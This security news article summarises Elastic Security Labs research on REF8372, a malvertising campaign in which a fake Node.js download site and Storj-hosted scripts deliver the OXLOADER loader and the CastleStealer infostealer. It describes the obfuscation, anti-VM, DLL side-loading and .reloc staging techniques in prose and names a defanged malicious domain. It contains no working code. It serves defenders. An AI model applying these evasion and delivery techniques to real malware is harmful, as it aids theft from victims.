"OXLOADER is in an early operational phase, but the engineering behind it suggests this family is worth watching," Elastic said.
REF8372: a paid-ad entry point and a pretend Node.js download
Elastic Security Labs has documented a campaign codenamed REF8372 that begins with malicious ads on Google. Users conducting searches such as "lts version of node.js" are redirected to a fraudulent site — node-js[.]prentiva99[.]info — surfaced through ads published under the verified name "ВОЛОДИМИР ТЕРЕЩЕНКО" and presented as based in Ukraine. Elastic's researchers note the advertiser account and its campaigns were removed from Google on May 14, 2026, but they do not assert whether that account is operated by the threat actor, a front, or a purchased identity.
Use of Storj to host scripts and executables
Victims who interact with the fake site are served a batch script hosted on Storj, a decentralized, open-source cloud storage platform. Elastic highlights the choice of Storj as deliberate: the campaign's reliance on a legitimate service demonstrates how actors can bypass domain-based reputation filters by hosting malicious components on widely used platforms.
How OXLOADER escalates and stages CastleStealer
The dropper behavior is multi-step. The Storj-hosted batch script presents a bogus installation wizard UI while covertly downloading an executable hosted on Storj called OXLOADER. That download is invoked with a PowerShell command executed with the -Verb RunAs flag to trigger a Windows User Account Control (UAC) prompt. Once launched, the loader uses DLL side-loading to load a rogue DLL which decrypts and executes the CastleStealer payload.
OXLOADER's obfuscation, staging and anti-analysis measures
Researchers Daniel Stepanic and Jia Yu Chan describe OXLOADER as using several advanced techniques to evade detection and analysis. The loader employs control-flow flattening, opaque predicates, and mixed Boolean‑Arithmetic; it contains self-modifying decryption stubs and abuses the Windows .reloc section to stage shellcode. Elastic also reports OXLOADER takes explicit steps to avoid running in sandboxed or virtualized environments. These engineering choices, Elastic says, have produced low detection rates across static engines and detonation runs, giving the loader "a window to operate before it gets hunted down."
CastleStealer, CastleLoader, and the BackgroundFix linkage
CastleStealer is identified as a .NET information stealer. Elastic notes it was recently distributed alongside CastleLoader in a separate campaign codenamed BackgroundFix, where the lure mimicked a free image-editing tool in a ClickFix-style approach. CastleLoader has been attributed to a threat activity cluster named GrayBravo. In REF8372, OXLOADER's role is to stage and deliver CastleStealer through the DLL side-loading and decryption sequence described by Elastic.
What this means for technologists, ad platforms, and end users
- Technologists and security teams: Elastic's write-up highlights the need to detect advanced obfuscation patterns — control-flow flattening, mixed Boolean‑Arithmetic, and self-modifying stubs — and to account for staging via .reloc and DLL side-loading. Low static-detection rates reported by Elastic indicate defenders should combine behavioral detonation and runtime telemetry with static signatures.
- Ad platforms and publishers: the campaign's use of Google Ads and a verified advertiser name underscores the potential for paid-ad channels to surface malicious landing pages; Elastic notes Google removed the advertiser account and campaigns on May 14, 2026. Whether the account was directly controlled by the actor or was a front remains unknown.
- End users and enterprises: the attack leverages a plausible query ("lts version of node.js") and a familiar software-installation UI to lure clicks. Elastic's findings show actors continue to exploit legitimate cloud services — in this case Storj — to host scripts and executables, enabling them to bypass domain-reputation controls that many organizations rely on.
Elastic concludes that OXLOADER is early in operations but deliberately engineered: its combination of obfuscation, anti-VM measures, benign‑looking masquerade code and unique staging techniques created a detection gap that the actor used to deliver CastleStealer. Key unresolved facts in Elastic's disclosure include whether the verified advertiser identity is genuinely tied to the actor and how many successful infections occurred before Google removed the ads on May 14, 2026. The documented reliance on Storj and the specific technical signatures Elastic and researchers Daniel Stepanic and Jia Yu Chan describe give defenders concrete artifacts to hunt for even as the campaign continues to evolve.
Original reporting: https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html
